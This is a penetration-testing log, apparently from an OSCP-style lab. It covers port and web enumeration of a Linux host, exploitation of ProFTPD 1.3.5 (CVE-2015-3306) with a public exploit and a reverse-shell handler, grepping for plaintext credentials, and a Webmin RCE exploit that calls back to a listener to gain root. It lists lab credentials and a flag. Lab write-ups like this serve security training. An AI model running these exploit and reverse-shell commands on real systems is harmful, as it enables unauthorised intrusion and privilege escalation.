🧪 Pentest Log: {{date:2025-08-27}}

🔍 Target Information

• Machine Name: VPS1723 V2
• IP Address: 10.11.1.53
• Operating System: Linux

ip=10.11.1.53

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

ProFTPD 1.3.5

Google for "ProFTPD 1.3.5 exploit", found

CVE-2015-3306

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://github.com/t0kx/exploit-CVE-2015-3306

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80

python3 ./exploit.py --host $ip --port 21 --path "/var/www/html/"

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: 33(www-data)
• Shell Type: reverse shell

🔍 Enumeration

Credential Find:

find . -type f -exec grep -iIl -- "password: " {} + 2>/dev/null

found

./demo.txt

username: demouser
password: x8rqsPHQ6X98A

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Public Exploit
• Target Binary/Service: webmin
• Reference / Source: https://github.com/esp0xdeadbeef/rce_webmin

🔧 Exploit Steps

• Smash to root

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 10000

python3 ./exploit.py -u 'http://10.11.1.53:10000' -un 'demouser' -pw 'x8rqsPHQ6X98A' -rh '172.16.1.2' -rp 10000

• Key File

djk43nls93mwz17dfvba